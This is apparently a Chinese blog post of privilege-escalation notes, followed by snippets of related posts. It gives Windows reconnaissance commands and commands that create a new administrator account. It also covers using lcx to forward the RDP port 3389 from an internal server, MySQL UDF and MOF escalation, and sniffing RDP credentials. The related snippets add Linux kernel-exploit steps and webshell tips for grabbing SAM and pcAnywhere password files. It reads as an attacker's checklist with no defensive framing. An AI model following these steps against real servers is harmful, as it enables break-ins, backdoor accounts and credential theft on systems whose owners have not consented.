提权篇

收集信息

内外网
服务器系统和版本  位数
服务器的补丁情况
服务器的安装软件情况
服务器的防护软件情况
端口情况
支持脚本情况

 信息收集常用命令:

Windows:

ipconfig  /all    
net  user
netstat  -ano
ver
systeminfo
tasklist  /svc
taskkill  -PID  pid号
taskkill   /im   qq.exe  /f
net  user  test  123456  /add
net  localgroup  administrators  test  /add
whoami

 CMD无法执行

1.防护软件拦截

2.CMD被降权

3.组件被删除

找可读写目录上传 cmd.exe,将执行的cmd.exe路径替换成上传的路径

查找3389端口

1、注册表读取

2、工具扫描

3、命令探针

端口转发

lcx

网站服务器是内网IP:192.168.2.3

外网服务器IP是:192.168.80.151

在内网服务器上执行的lcx命令是:lcx.exe  -slave  192.168.80.151  51   192.168.2.3   3389

在外网服务器上执行的lcx命令是:lcx.exe  -listen   51    3389

数据库提权:

MSSQL提权:安装组件------>开启3389------>创建用户------>提升权限------->完成

Mysql提权:

1)udf提权

  获取到对方数据库用户root的账号密码

  查看网站源码里面数据库配置文件(common,config.php,common.inc.php,data)

  查看数据库的配置文件

  暴力破解、mysql密码破解、3306端口入侵

udf提权原理:

  通过root权限导出udf.dll到系统目录下,可以通过udf.dll 调用执行cmd

  

2)启动项提权

3)mof提权

4)反连端口提权

Windows提权:

开启3389

使用批处理文件开3389
使用sql语句开3389
使用exe开3389
使用vb开3389

使用wireshark或cain嗅探3389获取账号名和密码

Linux提权:

uname  -r 查看内核版本信息

找到对应版本的exp

上传-----编译-----运行----ok

通过程序漏洞提权(略)

原文地址:https://www.cnblogs.com/steven9898/p/11405337.html

时间: 2024-10-15 14:12:08

提权篇的相关文章

Windows渗透与提权技巧汇总

参考:http://netsecurity.51cto.com/art/201312/426150_all.htm 1.旁站路径问题 2.用以下VBS: On Error Resume Next  If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then  MsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(

Linux渗透与提权:技巧总结篇

本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍. Linux 系统下的一些常见路径: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 6

内网提权-服务篇

服务提权 mysql UDF提权 要求有写权限,并且未过滤单引号 windows UDF导出到系统目录 C:/WINDOWS/SYSTEM32/ MYSQL版本 < 5.1 UDF导出到安装路径 MYSQL\Lib\Plugin MYSQL版本 > 5.1 linux /usr/lib/mysql/plugin MOF提权 只有windows 步骤 1.找个可写目录,将MOF文件上传 2.执行以下sql语句,mof文件内命令便会执行 select load_file('C:/wmpub/nul

Linux提权:从入门到放弃

日站就要日个彻底.往往我们能拿下服务器的web服务,却被更新地比西方记者还快的管理员把内网渗透的种子扼杀在提权的萌芽里面.Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置.一下是我总结的一些提权方法. 几点前提 已经拿到低权shell 被入侵的机器上面有nc,python,perl等linux非常常见的工具 有权限上传文件和下载文件 内核漏洞提权 提到脏牛,运维流下两行眼泪,我们留下两行鼻血.内核漏洞是我们几乎最先想到的提权方法.通杀的内核漏洞是十分少见的,因而我们应该先对系统相关

峰回路转的提权08r2服务器

事前日下这个站的时候说实话,略微的蛋疼.其过程就不写了,就讲讲提权吧.可能图片有点暗.看看我写这篇文章的时候就知道了. 这个学校我好多同学在里面读书,就萌生了.日下这个站的想法. 拿到shell,理所应当的是收集信息了. 2008r2的,哇靠哦.我第一反应就是再看看端口,因为一般08r2的exp能用的不多.先看看有没有waf. 第一个大家并不陌生,360嘛.至于第二个,可能有部分的同学不知道.是一个很出名的远控软件.速度相对比其他的好得多,你懂的.但是呢,有一个exp可以读取其账户资料的.也就是

【实战】一次艰难的入侵提权,成功拿下服务器

前言:这是在51CTO的第10篇文章,给大家来点给力的哈~这次的入侵检测在提权反弹连接上遇到了很多问题,让窝娓娓道来. Let's Go! 一,对目标网站的信息收集. http://www.XXXXX.cn  IP:122.225.XX.XXX [浙江省嘉兴市 电信] Server OS : Microsoft Windows NT 5.2.3790 Service Pack 2(xp || win server 03 sp1 or sp2)        Server Software : M

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

本文作者:i春秋签约作家--酷帥王子 一. 利用getwebshell篇 首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图: 下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到) 下面我们构造一个asp目录,如: http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp

最全的服务器提权

最全的WEBSHELLc: d: e:..... -------------------------------------------------------------------C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\

webshell提权技巧 -中国寒龙出品 关注网络安全

web)权限终极9技巧 当我们取得一个webshell时候,下一部要做的就是提升权限个人总结如下:1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆2.C:\WINNT\system32\config\进这里下它的SAM,破解用户的密码用到破解sam密码的软件有LC,SAMinside3.C:\Doc